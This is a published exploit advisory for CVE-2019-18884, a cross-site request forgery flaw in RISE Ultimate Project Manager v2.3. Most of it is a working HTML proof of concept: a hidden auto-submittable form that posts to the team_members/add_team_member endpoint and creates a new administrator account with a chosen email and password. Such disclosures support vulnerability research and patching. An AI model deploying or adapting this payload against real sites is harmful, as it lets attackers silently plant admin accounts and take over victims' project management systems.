Share
# Exploit Title: RISE - Ultimate Project Manager v2.3 - Cross-Site Request Forgery (Add Admin)  
# Date: 11-11-2019  
# Exploit Author: Ismail Tasdelen  
# Vendor Homepage: http://fairsketch.com/  
# Software Link : https://codecanyon.net/item/rise-ultimate-project-manager/15455641  
# Software : RISE - Ultimate Project Manager  
# Product Version: Version 2.3  
# Vulernability Type : Cross-Site Request Forgery  
# Vulenrability : Cross-Site Request Forgery (Add Admin)  
# CVE : CVE-2019-18884  
  
# index.php/team_members/add_team_member in RISE Ultimate Project Manager v2.3 has CSRF for adding authorized users.  
  
# CSRF PoC :  
  
<html>  
<body>  
<script>history.pushState('', '', '/')</script>  
<form action="http://rise.fairsketch.com/index.php/team_members/add_team_member" method="POST">  
<input type="hidden" name="first_name" value="Ismail" />  
<input type="hidden" name="last_name" value="Tasdelen" />  
<input type="hidden" name="address" value="ismailtasdelen@protonmail.com" />  
<input type="hidden" name="phone" value="+12345678975" />  
<input type="hidden" name="gender" value="male" />  
<input type="hidden" name="job_title" value="Security Researcher" />  
<input type="hidden" name="salary" value="100000" />  
<input type="hidden" name="salary_term" value="12" />  
<input type="hidden" name="date_of_hire" value="2019-11-11" />  
<input type="hidden" name="email" value="ismailtasdelen@protonmail.com" />  
<input type="hidden" name="password" value="iQ.grF10" />  
<input type="hidden" name="role" value="1" />  
<input type="hidden" name="email_login_details" value="1" />  
<input type="submit" value="Submit request" />  
</form>  
</body>  
</html>